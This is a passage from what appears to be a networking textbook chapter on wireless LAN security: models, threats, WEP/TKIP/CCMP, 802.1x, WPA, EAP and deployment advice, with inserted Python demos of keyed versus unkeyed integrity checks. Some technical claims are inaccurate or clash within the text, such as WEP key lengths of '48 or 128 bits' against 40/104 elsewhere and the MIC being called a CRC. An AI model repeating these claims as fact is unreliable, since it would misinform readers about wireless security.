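        out += hmac.new(enc_key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def seal(key: bytes, plaintext: bytes, nonce: Optional[bytes] = None) -> bytes:
    """Sender side (Tony): encrypt for privacy, then attach a keyed checksum (MAC)
    over nonce + ciphertext so the receiver can detect tampering."""
    nonce = nonce if nonce is not None else secrets.token_bytes(NONCE_LEN)
    keystream = _keystream(_subkey(key, b"enc"), nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, keystream))
    tag = hmac.new(_subkey(key, b"mac"), nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def open_message(key: bytes, packet: bytes) -> Optional[bytes]:
    """Receiver side (Kelly): recompute the checksum and compare before decrypting.
    Only a holder of the shared key can produce a matching tag, which is what
    authenticates the sender. Returns the plaintext, or None if the packet is rejected."""
    if len(packet) < NONCE_LEN + TAG_LEN:
        return None
    nonce = packet[:NONCE_LEN]
    ciphertext = packet[NONCE_LEN:-TAG_LEN]
    tag = packet[-TAG_LEN:]
    expected = hmac.new(_subkey(key, b"mac"), nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    keystream = _keystream(_subkey(key, b"enc"), nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, keystream))


def flip_bit(packet: bytes, byte_index: int) -> bytes:
    """Model a message altered while in transit (one bit of one byte changed)."""
    altered = bytearray(packet)
    altered[byte_index] ^= 0x01
    return bytes(altered)


def unkeyed_checksum_accepts_modified(message: bytes) -> bool:
    """Why the checksum must be keyed: a plain hash appended to the message can be
    recomputed after any change, so the receiver's comparison still passes."""
    altered = flip_bit(message, 0)
    forged = altered + hashlib.sha256(altered).digest()
    body, digest = forged[:-TAG_LEN], forged[-TAG_LEN:]
    return hmac.compare_digest(digest, hashlib.sha256(body).digest())


def demo() -> dict:
    """Run the exchange once and report what each check returns."""
    nonce = bytes(range(NONCE_LEN))   # fixed nonce so the demo is repeatable
    packet = seal(SHARED_KEY, b"meet at the usual place", nonce)
    other_key = hashlib.sha256(b"a party without the shared key").digest()
    return {
        "kelly_reads": open_message(SHARED_KEY, packet),
        "modified_in_transit": open_message(SHARED_KEY, flip_bit(packet, NONCE_LEN + 5)),
        "wrong_key": open_message(other_key, packet),
        "on_the_air": packet[NONCE_LEN:-TAG_LEN],   # all an eavesdropper sees
        "unkeyed_checksum_fooled": unkeyed_checksum_accepts_modified(b"meet at the usual place"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```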
It is not impossible to ensure secure wireless communications. Securing WLANs is possible if done
correctly. However, heightened awareness is required to ensure that you don't overlook a critical
component and thus create a back door.

Note
It might not be possible for you to think like a hacker, but it is not necessary, either. What is
important is to establish a security posture that identifies the parts of your network (or
information that passes through it) that are most sensitive and need protection.

Different Security Models


Depending on how you decide to combine the security elements mentioned in the preceding section,
different security models are appropriate. This section describes the most commonly adopted models,
which include the following:
- No authentication, encryption, or hashing
- Native encryption only
- Native authentication only
- User-based authentication
- Machine-based authentication
- Native encryption and authentication but no hashing
- Authentication and encryption using overlay security solutions

No Authentication, Encryption, or Hashing


By providing no method of authentication, encryption, or hashing, your network is most open to attack.
However, an attack doesn't necessarily mean that an individual wants to break into your network with
malicious intent. It can also mean that an individual inadvertently attaches to your WLAN and uses your
network resources.
Even though this model leaves you most open to unauthorized use of your WLAN, sometimes you will
choose not to authenticate users or encrypt data. One such situation is when you want to provide your
guests with WLAN connectivity.

Note
On occasion, little or no WLAN protection is available for proprietary devices or unique
operating systems.

Native Encryption Only


Because WLANs use radio as a transmission medium, the first line of defense offered by wired networks,
physical medium control and containment, is not present. Indeed, LANs are somewhat protected by
their physical structure, with some or all parts in a building or underground. To provide some kind of
physical isolation similar to wired LANs, the 802.11b standard defined the Wired Equivalent Privacy
(WEP) security protocol. WEP intends to provide some degree of privacy by encrypting the information
between the radio endpoints.
Because WEP was designed when WLANs were in their infancy, it is not surprising to see that WEP
turned out to be less effective than initially expected. WEP does not provide true end-to-end security
because it only operates at the two lowest layers of the OSI model: the physical and data link layers.

Note
Any time you expose a standard to the general community, you risk compromising the
standard because hackers can reverse-engineer the standard to develop an exploit.

In addition, WEP uses a static symmetric key to encrypt the data. The key's static nature is a challenge
because key management becomes complicated and a vulnerability is created that propagates to other
parts of the security chain. Key management challenges include
- Distributing keys
- Supporting timed changes
- Determining how to address the physical loss of end devices
Finally, WEP employs a key length of 48 or 128 bits. Given the continued and accelerated growth in
computing power, standard desktops are now capable of quickly breaking these keys through exhaustive
searches.

Native Authentication Only


Authentication and authentication protocols control access to a network. Keep in mind that
authentication does not secure the data that is transmitted on the network. Authentication protocols are
designed to ensure that the user or device that is attempting to communicate is indeed whom it claims.
It is analogous to a secured door in a large office building. By swiping your identity card, you are
"authenticating" yourself. If the card is permitted access, the door is unlocked. Note that in this analogy,
the card is authenticated, not the person carrying the card. Furthermore, the ID card does not provide
security after you're inside the door. As such, you can make the distinction between two forms of
authentication: One is authentication of the user, and the other is authentication of the device.

User-Based Authentication
User-based authentication is probably the most common form of authentication deployed in today's
enterprises. Users are given a password that only they are supposed to know. A system challenges the
user to provide a username and password. After the pair is checked against a corresponding database,
the user is either granted or declined access.
This method's considerations and challenges include password strength and password management.
Because in-depth coverage falls outside of the scope of this book, refer to other resources, such as
Security and Usability: Designing Secure Systems That People Can Use by Lorrie Faith Cranor and
Simson Garfinkel (O'Reilly Press, 2005), if you are interested in learning more.

Machine-Based Authentication
Machine-based authentication goes a step further and verifies the identity of the devices that attempt to
join your WLAN. Machine-based authentication is credential-based with the credential hard-coded in the
device. This credential is a password of sorts for the machine. Like a person, the machine must be
registered to be able to use the network. This credential is either derived or stored locally, or it can be
dynamically assigned.
These methods will vary in complexity, but all are tied to an authentication service that is present in the
core infrastructure.

Native Encryption and Authentication But No Hashing


The most common mechanism used by enterprises to secure WLANs is the incorporation of both
encryption and authentication. Both can be provided in numerous ways. Authentication and encryption
have evolved to combat numerous attacks, vulnerabilities, and protocol shortcomings. This evolution has
also increased their complexity.
Data encryption can be achieved in many ways. Encryption can be performed using either symmetric or
asymmetric (that is, public/private) key pairs, and the keys can be either statically or dynamically
assigned. Asymmetric keys are typically harder to break because breaking them requires more
computational horsepower. Similarly, dynamically assigned keys generate more computational overhead.
However, the automation greatly simplifies key management. As the computing power of clients has
increased, the encryption on the WLAN has evolved from the simple but hard-to-manage WEP to the
complex but easy-to-manage certificate-based key pairing. The later section "Encryption" goes into more
detail on this subject.

Authentication and Encryption Using Overlay Security Solutions


Overlay security solutions employ higher levels of the OSI model to secure communications. Even at
these higher levels, the same basic security features exist: encryption, authentication, and hashing.
However, given the availability of additional information and embedded intelligence, the result is a higher
degree of security sophistication. As such, Virtual Private Networks (VPN) and generic routing
encapsulation (GRE) tunneling provide a more secure form of end-to-end communications. Both
solutions work on the premise that a secure virtual communications tunnel is constructed between the
communicating endpoints through which all data is securely sent. The use of an overlay security solution
can sometimes cause disruption because the "tunnel" is a virtual point-to-point connection that needs to
be reestablished anytime the connection is broken. Overlay solutions can also cause an added burden to
the user or administrator. The user must complete an additional layer of security (setting up a VPN), and
the administrator needs to manage all the virtual tunnels.

Note
GRE tunnels are not the means of encryption; they are only the logical manner in which
encrypted traffic is routed in the network. For the GRE tunnel to be encrypted, it requires an
underlying protocol, such as IPSec or 3DES. Both are commonly used for encryption today.

No WLAN
Although it is not practical, not allowing the use of WLANs is one way to consider handling the issue of
security. This book is an advocate of deploying WLANs when they make the best business sense. In this
case, "no WLAN" should mean "No WLAN at this time."

WLAN Security Threats


The nature of wireless communications makes defending against attacks very difficult but extremely
necessary. Threats come in many forms. The vulnerability and exposure of your network comes from
inside and outside your network. Arguably, the internal troubles typically outnumber the external
threats.
Security threats surface as disruption in service, unintentional leaks, and industrial espionage. Both
professionals and amateurs carry out attacks against WLAN security shortcomings, which is facilitated by
a plethora of publicly available tools. Even then, it might not be a person but rather a byproduct of a
careless design. The following describes three profiles of people who can compromise a network.
- The malicious hacker: This is the person who actively tries to exploit security weaknesses of the
network. This person's intent is to cause mischief, steal intellectual property, or cause business
disruption.
- The unaware employee: The unaware employee is becoming more common. This is a person who
has unintentionally opened a vulnerability either directly (such as by installing a rogue AP) or
indirectly (such as acting as a catalyst for the spread of a computer virus).
- The war driver: War driving is when individuals or groups drive around and actively look for
unprotected WLANs. In some cases, people mark the streets or sidewalks with chalk to indicate the
presence of unprotected WLANs, which is also known as war chalking.
Now that we know who can carry out WLAN attacks, we will outline the different attack strategies that
can be employed. The attack strategies are interception, rogue APs, and denial of service.

Interception
Because there is no physical link in wireless and because radio transmissions are not contained by
physical boundaries, data can be intercepted. Any data that is intercepted is compromised as it can be
reassembled, resulting in loss of intellectual property or exploitation of other safeguards.
You can, however, put security protocols into place to mitigate or thwart the threat of interception. This
is covered in the next section. Interception provides a catalyst for malicious behavior in one of two
ways:
- Eavesdropping: Data sent over a wireless medium can be captured over time. Given enough time,
even encrypted data can be decrypted, although well-developed encryption techniques will extend
this time from days to years.
- Impersonation: Commonly known as "man-in-the-middle" attacks, even when the data is
sufficiently protected against prying ears, devices can be impersonated. This can lead to service
availability attacks or inadvertent data capture, with the latter leading to the possibility of encryption
cracking.

Rogue APs
Rogue access points are by far the most elusive culprits in a WLAN deployment. Many vendors are
building solutions that will tackle the problem of rogue APs. Basically, rogue APs are internal or external
to your network and can either create a security hole or cause enough interference to disrupt service.
Internal rogues usually occur when an employee introduces an AP to the internal network.
Ongoing commoditization has resulted in a steep drop in the price of access points. As the cost barrier is
removed, some people will not only purchase an AP, but also independently decide to "plug" the
personal AP into the network in an attempt to gain more freedom and mobility. One way to thwart this
problem is to provide ubiquitous WLAN coverage. However, you can't be sure that this solution will stop
the practice entirely.
Rogue APs are typically not intentionally malicious, but they require more effort to detect and mitigate.
They threaten the network's well-being and the integrity of the wireless space. Because WLANs rely on
the availability of channels of the RF spectrum, having competing devices in the same RF space will
likely disrupt your WLAN service.

Denial of Service Attack


A sometimes overlooked security threat is the overloading of the network that results in the inability to
access the network. This Denial of Service (DoS) is a very real threat and can be easily carried out
against a WLAN. These attacks, although usually intentional, can sometimes happen by accident. DoS as
a security concern can never be ruled out because it can never be completely avoided. DoS has one
critical effect on the enterprise: the denial of access to the RF space and thus the lack of network access.
You learned in Chapter 2 that there is an opportunity cost associated with unavailability of network
access. As the organization becomes more dependent on information and network access, this
opportunity cost can rapidly escalate with downtime.

Wireless Security Mitigation Techniques


WLANs employ specific methods for encryption, hashing, and authentication. Figure 7-1 illustrates the
general elements that make up the embedded WLAN security.

Figure 7-1. Embedded WLAN Security

Encryption
Encryption is the action taken to mask the elements in a data stream. This is done by applying a variable
(key), which is known by a sending station and a receiving station, to an algorithm that encodes and
decodes the transmission. In this section, you will find three basic flavors of encryption that have been
applied to WLANs for securing over-the-air transmissions. Each is still suitable for use today. However,
they are typically not used in enterprise environments as they are insufficiently robust.
The initial encryption method was WEP, which provided sufficient protection in early WLAN deployments.
Over the years, the ability and desire of people to crack encryption algorithms and break ciphers has
increased. As such, more robust encryption schemes are continuously developed to offset weakened
methods and to retain the possibility of secure communication. WLANs have thus seen the displacement
of WEP by the schemes named CCMP and AES. Let us compare these three methods.

WEP

WEP is an encryption algorithm that is built into the original 802.11 standard. WEP encryption uses the
RC4 stream cipher with either 40- or 104-bit keys and a 24-bit initialization vector. WEP was initially
deployed as a static key written onto the client, which caused a burden on key management.

Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)
CCMP is a cipher mode using 128-bit keys with a 48-bit initialization vector (IV), which helps prevent replay attacks.
The Cipher Block Chaining Message Authentication Code (CBC-MAC) component of CCM provides data
integrity and authentication.

Note
Although CCMP is a very strong encryption standard, it requires more computing power
than WEP. This is important because some wireless access points might not have sufficient
computing power to support CCMP.

Advanced Encryption Standard (AES)


AES was developed for securing sensitive but unclassified material by the U.S. government. By directive
of the National Institute of Standards and Technology (NIST), a replacement for the Data Encryption
Standard (DES) and to a lesser degree 3DES was commissioned. The specification required a symmetric
algorithm using a block encryption of no less than 128 bits in size. Note that AES also forms the
underlying encryption algorithm used in CCM. Its requirement and subsequent ratification by the U.S.
government prompted acceptance by the general public.
The capability of AES encryption to remain protected is estimated in years, as opposed to the weeks or
days estimated for other current encryption methods.

Note
AES was built on the cipher developed by two Belgian cryptographers, Joan Daemen and
Vincent Rijmen, called Rijndael.

Hashing
Hashing prevents man-in-the-middle attacks as it ensures that messages that have been tampered with,
while they were in transit, can be identified by the receiver. This is independent of whether the message
is encrypted. This section details Temporal Key Integrity Protocol (TKIP) and Message Integrity Check
(MIC), which we refer to as radio side protection throughout this chapter. Both of these are used to
maintain the integrity of the information sent over the RF.

TKIP (Temporal Key Integrity Protocol)


You can think of TKIP as a wrapper or enhancement for WEP. WEP is still the underlying encryption
standard, but TKIP significantly improves the security by addressing its weak hashing capabilities. Using
TKIP, every key is "rehashed," effectively giving each packet its own key. Because the attacks upon WEP
rely on capturing tens of thousands of packets that use the same key to attempt to identify the actual
key, TKIP never reuses the same key. As such, it greatly reduces the risk of the key being discovered.
TKIP is also part of the WPA standard.

Message Integrity Check


In order to combat the ability of a hacker to intercept, examine, and forward on a packet to an AP, there
is a need to provide an additional layer of radio side protection. This is done through the insertion of an
8-byte MIC placed between the data portion of the 802.11 frame and the 4-byte Integrity Check Value
(ICV). The MIC field is encrypted along with the frame data and the ICV. This is essentially a cyclic
redundancy check (CRC) for wireless and is intended to prevent replay attacks, that is, the replay of an
intercepted packet.
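The checksum that Tony and Kelly attach earlier in this chapter and the MIC described above share one requirement: the receiver's recomputation must be something a third party cannot reproduce. The following Python example is added here and is not from the book; it contrasts an unkeyed CRC-32 ICV with a keyed 8-byte MIC on constructed sample messages, modelling the keyed MIC with truncated HMAC-SHA256 rather than the 802.11 MIC function.

```python
import hashlib
import hmac
import zlib

# Constructed sample values (not from the book): a key shared only by Tony and
# Kelly, and one message Tony sends to Kelly over the air.
SHARED_KEY = b"tony-kelly-integrity-key"
MESSAGE = b"Tony->Kelly: approve payment of 100"


def crc32_icv(data: bytes) -> bytes:
    """Unkeyed 4-byte checksum, in the style of WEP's CRC-32 Integrity Check Value."""
    return zlib.crc32(data).to_bytes(4, "big")


def keyed_mic(key: bytes, data: bytes) -> bytes:
    """Keyed 8-byte message integrity check (the MIC size quoted in the text).
    Modelled as truncated HMAC-SHA256 to show the keyed property; 802.11 uses
    its own MIC functions, so this is not the standard's algorithm."""
    return hmac.new(key, data, hashlib.sha256).digest()[:8]


def kelly_accepts_crc(frame: bytes) -> bool:
    """Receiver: split off the 4-byte ICV, recompute it over the data, compare."""
    data, icv = frame[:-4], frame[-4:]
    return hmac.compare_digest(crc32_icv(data), icv)


def kelly_accepts_mic(key: bytes, frame: bytes) -> bool:
    """Receiver: split off the 8-byte MIC, recompute it with the shared key, compare."""
    data, mic = frame[:-8], frame[-8:]
    return hmac.compare_digest(keyed_mic(key, data), mic)


def flip_one_bit(frame: bytes) -> bytes:
    """Accidental corruption in transit: a single payload bit changes, tag untouched."""
    damaged = bytearray(frame)
    damaged[5] ^= 0x01
    return bytes(damaged)


def substitute_with_crc(new_data: bytes) -> bytes:
    """Deliberate modification of a CRC-protected frame: anyone can recompute
    an unkeyed checksum over replacement data, so the frame still verifies."""
    return new_data + crc32_icv(new_data)


def substitute_with_mic(original_frame: bytes, new_data: bytes) -> bytes:
    """Deliberate modification of a MIC-protected frame without the key: the
    best a third party can do is reuse the original tag, which no longer matches."""
    return new_data + original_frame[-8:]


def integrity_check_results() -> dict:
    """Run both checks against accidental damage and deliberate substitution."""
    crc_frame = MESSAGE + crc32_icv(MESSAGE)
    mic_frame = MESSAGE + keyed_mic(SHARED_KEY, MESSAGE)
    forged = b"Tony->Kelly: approve payment of 999"
    return {
        # Both checks catch random corruption.
        "crc_detects_bit_flip": not kelly_accepts_crc(flip_one_bit(crc_frame)),
        "mic_detects_bit_flip": not kelly_accepts_mic(SHARED_KEY, flip_one_bit(mic_frame)),
        # Only the keyed check catches a rewritten payload.
        "crc_detects_substitution": not kelly_accepts_crc(substitute_with_crc(forged)),
        "mic_detects_substitution": not kelly_accepts_mic(
            SHARED_KEY, substitute_with_mic(mic_frame, forged)
        ),
    }


if __name__ == "__main__":
    for check, caught in integrity_check_results().items():
        print(f"{check}: {'caught' if caught else 'NOT caught'}")
```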
Table 7-1 summarizes the different security models described.

Table 7-1. Different Security Models at a Glance

                   | WEP                  | TKIP       | CCMP
Cipher Type        | RC4                  | RC4        | AES
Key Size           | 40 or 128 bits       | 128 bits   | 128 bits
Key Life           | 24-bit IV            | 48-bit IV  | 48-bit IV
Integrity Check    | CRC-32 (Data only)   | MIC        | CCM
Replay Counter     | None                 | Inherent   | Inherent
Key Management     | None                 | EAP-based  | EAP-based

Authentication
Authentication is the process in which the identity of a user or device is validated. This is typically done
using passwords or certificates. Note that authentication assumes some degree of implicit trust. For
example, the use of passwords assumes that a password is known only to the authenticating entity. The
same is true for certificates as they, in theory, can be handed off to somebody else. Furthermore, in the
case of certificates, you need to trust the authority that extends the certificates.
This book does not cover this topic in-depth. However, you should be aware of these nontrivial
challenges regarding trust and authentication. In the remainder of this section, we cover the methods
and frameworks that are commonly used in WLANs: specifically, 802.1x, Wi-Fi Protected Access (WPA),
and 802.11i.

802.1x
The 802.1x standard is a framework that defines a common process of communication for both wired
and wireless LAN-based devices to initiate and secure point-to-point authentication. The 802.1x LAN
standard can be applied to any subset of the 802 family. Its mainstream debut came at the time when
WLAN products hit the mass market. Because standalone WEP was already known to be weak, 802.1x
found a niche in which it could help to ensure the secure transmission of data in a WLAN. It is very
important to understand that the standard only outlines the framework for communication. This
framework allowed vendors to provide various underlying authentication methods (which you learn
more about in the section "EAP Types"), each with its own distinctive features.
The framework defines mutual authentication of devices and recommends the use of RADIUS as an
authentication protocol. There are three key components to the 802.1x framework:
- Supplicant (STA): The client device that is requesting access. Typically this device is enabled by
software, which performs the actual process.
- Authenticator (Auth): Plays the role of the middle man, providing an entry point from an
untrusted network to a trusted one.
- Authentication server (AS): Acts as the validation point of contact. The authentication server
maintains a database of all known authenticators and also maintains entitlement for the user or
device. This user database can reside on a separate system.
The authentication communication between a client device and the authentication server is broken into
two stages, as shown in Figure 7-2:
- The first mode is Extensible Authentication Protocol (EAP), or EAP over LAN (EAPoL), which is the
encapsulation format.
- The second mode is RADIUS, where the credentials are passed for validation against the
authentication database.

Figure 7-2. 802.1x at a Glance

Note
In Figure 7-2, the supplicant can be any end device (laptop, desktop, PDA, phone). The
authenticator can be a switch or AP.

Wi-Fi Protected Access


Wi-Fi Protected Access (WPA) is a standard developed by the Wi-Fi Alliance primarily as a method for
interoperability between Wi-Fi vendors. The Wi-Fi Alliance is a coalition of vendors with the charter of
finding a common solution for wireless security. The WPA standard helps to mitigate the inherent
shortcomings of WEP by protecting the transmission of data in the RF space by mandating the use of
TKIP, MIC, and 802.1x.
WPA has two modes:
- EAP and RADIUS in enterprise mode
- Pre-shared keys (PSK) in non-RADIUS environments
WPA is built to support WEP as the encryption method, whereas the second phase of WPA, WPA2,
supports the addition of CCMP for authentication.
Table 7-2 summarizes the features of the different WPA types.

Table 7-2. Differences Between WPA Types at a Glance

WPA Enterprise Mode                                        | WPA PSK Mode
Requires an authentication server                          | Does not require an authentication server
Uses RADIUS protocols for authentication and key           | Uses shared secret keys for authentication
distribution                                               |
Centralizes management of user credentials                 | Provides device-oriented management of user
                                                           | credentials
Uses 802.1x as an identity framework                       | --

802.11i
Based on WPA, the IEEE has ratified 802.11i as a wireless security standard to help provide a more
robust method of protection. This standard introduces new and stronger encryption and hashing
methods. It expands the initial validation (handshake) between the AP and client while still using 802.1x
for the actual authentication process. 802.11i also mandates the use of AES. The principal
enhancements are
- Discovery: A four-way handshake to authenticate the AP and client
- Authentication: The 802.1x framework for end-to-end authentication
- Key management: Method through which systems derive an encryption key that ensures integrity
for the whole session
- Data Protection: Encryption of parts of the data packet
Figure 7-3 illustrates the relationship between these four parts of 802.11i. Each shaded area refers to
one of the four functions listed previously.

Figure 7-3. Functions of 802.11i

802.11i uses EAP as the end-to-end transport for authentication and 802.1X (EAPoL) to encapsulate
these EAP messages over WLANs.
During the discovery phase, participants determine the parties with whom they will communicate. The
AP informs the client which security features are required to be used for communications.
Authentication employs 802.1x as a framework and further specifies the following:

1. The use of centralized network admission policy at the AS.
2. Determination of the STA as to whether it does indeed want to communicate.
3. Mutual authentication between the STA and Auth.
4. Generation of a master key as a side effect of authentication.
5. Use of a master key to generate session keys.
Key management also uses the 802.1x framework with the addition of a four-way handshake, which
ensures that the client and AP are valid devices (trusted). Because the session key used in client and AP
transmissions is valid for the length of the session, an additional mechanism was added to the protocol
to help maintain the integrity of the key. Specifically, the following actions take place (four-way
handshake):

1. Bind Pair-Wise Master Key (PMK) to STA and AP.
2. Confirm that both AP and STA possess a PMK.
3. Generate new Pairwise Transmit Key (PTK).
4. Prove each peer is live.
5. Synchronize PTK use.

EAP Types
The Extensible Authentication Protocol (EAP) is a framework for sending authentication information and
encryption keys from the authentication server (AS) to the client (STA) and AP (Auth). The
authentication methodology (password-based, public key infrastructure (PKI), or certificate) is set by the
organization.
The EAP session thus adopts the following event sequence:

1. A wireless client associates with an access point, which prohibits the client from gaining access to
anything (except the authentication server) on the network until it has logged in and authenticated.
2. The client (STA) and AP (Auth) perform a mutual authentication (handshake). The AP receives an
authentication request from the client and sends back a challenge. The client then completes this
challenge. The AP then forwards the information to the authentication server (AS), using the
client's and AP's credentials.
3. When successful, the client and authentication server derive an encryption key. The key can be
derived in several ways, and each EAP type defines the specifics. Additionally, during the process,
the client and server also derive a broadcast key. All data is subsequently encrypted using this key
pair.
4. As a further measure to maintain integrity, the key pairs can be changed at regular intervals. The
AAA server manages this function.
The following list describes different EAP types. Note that this is not a comprehensive catalog of all EAP
types. However, it does include all the mainstream versions:
- EAP-TLS (Transport Layer Security): Developed by Microsoft as a LAN-based authentication
type.
- EAP-LEAP (Lightweight Extensible Authentication Protocol): The Cisco version that was
developed exclusively for WLAN security. It is also known as Cisco-EAP.
- EAP-PEAP (Protected Extensible Authentication Protocol): Developed by Microsoft, Cisco, and
RSA Security.
- EAP-FAST (Flexible Authentication via Secure Tunneling): Second-generation WLAN security
EAP type from Cisco.
- EAP-TTLS (Tunneled Transport Layer Security): Developed by Funk Software and Certicom.
Table 7-3 summarizes the features of different EAP types.

Table 7-3. EAP Type Features

(Only the column headings and row labels of this table survived extraction; the per-cell entries are not reproduced.)

Security Type     | User Auth | WEP | Device Auth | Tunneled | Certificate Based: Server | Certificate Based: Client | TKIP / MIC
EAP-TLS           |           |     |             |          |                           |                           |
EAP-TTLS          |           |     |             |          |                           |                           |
Cisco-EAP (LEAP)  |           |     |             |          |                           |                           |
EAP-FAST          |           |     |             |          |                           |                           |
VPN               |           |     |             |          |                           |                           |
PEAP              |           |     |             |          |                           |                           |

Building a Secure WLAN


This section provides guidelines for building a secure WLAN. These recommended practices are offered
as tried and tested methodologies for addressing this challenging topic. Every enterprise comes with its
own unique environment, infrastructure, and security challenges, but by following these suggestions and
tailoring them to your specific needs, you can be sure that you have addressed the most common
security issues encountered today.

Trusted Versus Untrusted Wireless Networks


One of your first decisions is whether your wireless network will be trusted or untrusted. This is an
architectural issue, but it has a fundamental impact upon the security model you adopt. In the trusted
model, you consider your WLAN to be an integral part of your intranet. The WLAN lies inside your
secured fortress. In the untrusted model, you regard your WLAN as an extranet. The WLAN lies outside
the secured perimeter of the organization. As such, you should make this decision very early in the
planning or design phase of the PPDIOO lifecycle.

Trusted WLANs
Trusted wireless networks are fully integrated into the existing enterprise network. It is assumed that
the integrity of the network is implicitly protected. WLAN security is placed at the network edge, where
the clients or devices authenticate and the traffic is encrypted. From a security perspective, trusted
wireless networks are the preferred type of deployment today.
The advantages of a trusted WLAN include
- Ease of use
- Variety of EAP mechanisms
- Possibility of single sign-on
- Capability to roam across Layer 2 and Layer 3
- Ability to support wireless voice and multicast traffic

Untrusted WLANs
In an untrusted wireless network, the assumption is that the network integrity is easily compromised.
This assumption indicates that security does not exist or is incapable of providing necessary protection.
Data in an untrusted WLAN is therefore considered "open," and hence there is the need to be explicit
about security.

The advantages of an untrusted WLAN include:
- No differentiation among traffic, as all traffic is considered suspect.
- Isolation of WLAN attacks, as the WLAN is separate from the enterprise network.
- No additional infrastructure is needed to support WLAN security.

Define a Clear Security Posture


A security posture is a framework of terms, protocols, standards, and policies that relate to protecting
your wireless environment. It should at a minimum provide guidelines for
- The particular encryption protocols you choose
- The authentication method and standards adopted
- Your password policy
- A user access policy
- A list of the devices and clients your WLAN will support
The critical steps of selecting an authentication mechanism and encryption strategy for your WLAN are
discussed next.

Note
A common mistake when developing a security plan is to confuse authentication with
encryption. Authentication is the process of validating an end user or device, whereas
encryption is the function of hiding the original text in a cipher.

Define Your Authentication Mechanism


Earlier in this chapter, you learned about the two authentication types: user-based and machine-based.
The most commonly adopted and recommended authentication mechanism is EAP. An added advantage
of EAP is that it supports both types of authentication. Your choice of EAP type is impacted by many
factors, including the following:
- The client devices you intend to support
- Your existing security policy
- Your existing security infrastructure
- The capabilities of your security system to support several authentication methods, in particular
different ones, simultaneously
Some EAP mechanisms make it extremely difficult to compromise a WLAN; however, they are
correspondingly difficult to set up and maintain in large deployments. If security is of the utmost
importance, this additional operational overhead is probably acceptable. On the other hand, some EAP
mechanisms offer less protection and should not be seriously considered for an enterprise-class
deployment. Carefully consider the tradeoffs between robustness of the authentication scheme, ease of
management, and computational requirements on the client's end. Unavailability of appropriate software
on clients typically limits the type of EAP you can practically use. Supporting a wide range of devices adds
more analysis to the EAP type selection process. Refer to the section "EAP Types" for more information.
The impact that clients have on your EAP selection is directly related to the following questions:
- Does your enterprise certificate require a Certificate Authority (CA)?
- Do you use shared keys, which require a public key infrastructure (PKI)?
- What client platforms will you support?
- What client authentication systems are you already using?
Different EAP types strike a different balance between complexity and security. Figure 7-4 depicts the
trade-off for common EAP types.

Figure 7-4. The Difficulty, Complexity, and Level of Security for EAP Types

Select Your Encryption/Data Integrity Type


Another significant decision for wireless security is choosing an appropriate encryption type for your
environment. Although you might be inclined to choose the most secure option available, this choice
might not be practical for your environment. Complexity, computational power, and user convenience
are also key considerations. Yet again, a balance is required.
Currently, the most popular standard is 802.11i using the Advanced Encryption Standard (AES). AES's
benefit of robustness comes at the expense of increased computational overhead. Devices that intend to
use AES should be provided with sufficient computing power so that they can process encryption
transparently without negatively impacting other tasks of the device. Therefore, the more practical issue
you need to consider is determining the most secure method that all your approved devices can handle
given their existing computational horsepower. An alternative strategy is to deploy multiple security
types according to the capabilities of the devices you support.

Establish a Password Policy


In any networked enterprise, it is important to have a password policy, and it is highly likely that you
have already defined yours.
In some enterprise deployments, a completely separate set of user credentials is used to provide access
to the wireless network. One-time passwords (OTPs) are a good example. Users do not enter their
"native" credentials to access the WLAN; instead, they use a randomly generated OTP provided by a
smart card or by software on the client device.
Just like any of the other security decisions you make, the password policy must take into account
conflicting goals such as ease of use, deployment, and support (for users and devices).
Here are some considerations:
OTPs:
- Select a smart card vendor or manufacturer if you have not already.
- Consider the back-end infrastructure to support the OTP system.
- Consider the operational overhead and support impact of deploying OTP software or
physical smart cards to every user.
Native user credentials:
- Implement a strong password policy that requires complex passwords: a mixture of
uppercase, lowercase, and extended characters.
- Require passwords that are longer than the usual eight characters.
Wireless-only alternate user credentials:
- Consider the overhead of maintaining a set of alternate user credentials.
- Consider the impact of users having to remember another set of credentials.
- Alternatively, if you choose to store or cache the credentials on the device, you must assess
the risk of them being compromised.

Note
There is an added risk concerning the protection of authentication credentials when they are
cached on a device. Sometimes, however, this does not outweigh the benefits of caching
credentials. For example, hospitals often store user IDs and passwords on devices so that
doctors are not troubled with entering them.

Define a Clear WLAN Security Policy


Defining a clear and consistent security policy is an essential part of securing your WLAN. This WLAN
security policy should provide guidelines on questions such as the following:
Who has "ownership" of the RF airspace within the enterprise?
Who can install access points or WLANs?
What operating systems are supported?
What client devices are supported?

Note
A security policy is a collection of practices and guidelines that set a standard for behavior and
use on the network. A security policy is different from a security posture in that a security
posture represents a collection of actions that are used to provide a level of protection for the
network.

Secure Your APs


Policies and procedures only set guidelines. As such, specific measures must be in place to reduce risk.
Configuring your access points correctly is a critical step in securing your WLAN. We recommend that
you specifically address the following parameters of access points.

SSID
As described in Chapter 1, "Introduction to Wireless LAN Technologies," the Service Set Identifier (SSID)
is analogous to a network name. It is used only to identify your network to client devices. Hence, it is
not a true security measure. Handling SSIDs properly is nevertheless part of recommended operational
practice, because learning the SSID is the first step toward compromising your network. Any default
setting is an open invitation for malicious attack and therefore should be changed. An added security
measure is not allowing your SSID to be broadcast openly. This measure helps to eliminate any
accidental discovery of the SSID. If broadcasting the SSID is necessary (such as for guest networks), the
SSID should be put into a separate network space, such as its own VLAN.

Implement a Secure Management Policy for APs


To secure your WLAN, you must also implement a policy to manage your APs so that standards can be
updated and enforced. The following list outlines the essential steps:
Step 1. Create a management VLAN. The management VLAN should be created on the wired interface of
the access point. It is used to separate management traffic, such as SNMP and SSH, from data traffic. By
limiting management to a particular VLAN, you can provide a more secure path for critical traffic to
prevent it from being "overheard."
Step 2. Disable non-secure protocols. Specifically, disable the following protocols:
Telnet: Although Telnet allows for remote administrative logon to the access point, it is not a secure
protocol because it transmits all data, including passwords, in clear text. Disable Telnet on all VLANs,
including the management VLAN.
HTTP access: HTTP access to the access point provides users and operational staff with the ability to
configure the device through a web browser. Once again, this is typically an insecure feature and should
be disabled if at all possible. If your support staff absolutely must have HTTP access to the access
points, then it should be limited to the wired management VLAN only. However, because of the risk of
transmission in clear text, we strongly recommend that HTTP access be disabled altogether.
